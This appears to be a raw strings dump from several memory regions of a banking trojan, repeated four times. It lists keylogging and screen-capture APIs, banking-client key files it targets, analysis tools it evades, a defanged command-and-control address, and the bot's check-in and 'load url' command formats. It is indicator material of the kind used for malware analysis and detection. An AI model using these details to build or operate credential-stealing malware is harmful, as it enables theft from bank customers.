Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

ADM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\pcqovw.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Dwm.exe_2008_rwx_006A0000_000B4000:

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Dwm.exe_2008_rwx_00B80000_000BA000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

Bve.Bv|

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

ADM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\pcqovw.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Explorer.EXE_2024_rwx_067D0000_000B2000:

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Explorer.EXE_2024_rwx_068D0000_000B8000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

Bve.Bv|

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
